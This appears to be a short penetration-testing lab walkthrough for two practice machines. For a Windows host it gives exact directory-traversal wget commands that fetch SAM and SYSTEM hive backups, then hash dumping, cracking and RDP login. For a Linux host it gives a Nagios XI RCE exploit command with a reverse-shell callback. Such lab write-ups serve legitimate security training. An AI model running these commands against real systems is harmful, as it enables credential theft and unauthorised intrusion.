Ashley Brown (.161)	
Operating System	Windows
Points	10
Similar Machine (Root)	

Steps to Root

- 1. Find the port for website
- It is vulnerable to Directory Traversal and LFIhttps://www.exploit-db.com/exploits/23318
- 3. Get the SAM wget http://192.168.XX.161/..%5C..%5C..%5C..%5C..%5CWindows..%5CSystem32..%5Ccon fig..%5CRegBack..%5CSAM.OLD -O sam.old
- 4. Get the SYSTEM wget http://192.168.XX.161/..%5C..%5C..%5C..%5C..%5CWindows..%5CSystem32..%5Ccon fig..%5CRegBack..%5CSYSTEM.OLD -O system.old
- 5. pwdump system.old sam.old and you will get the Hashes
- 6. Brute it with john
- 7. Login to RDP
- 8. Root shell!

Nagy (.153)	
Operating System	Linux
Points	10
Similar Machine (Root)	

Steps to Root

- 1. Nagios XI 5.5.6 Remote Code Execution / Privilege Escalation https://www.exploit-db.com/exploits/46221
- 2. Run python nagios.py -t 192.168.XX.216 -ip 192.168.XX.XX -port 8081 -ncip 192.168.XX.XX -ncport 443
- 3. User shell!

Alternative exploit: https://github.com/jakgibb/nagiosxi-root-rce-exploit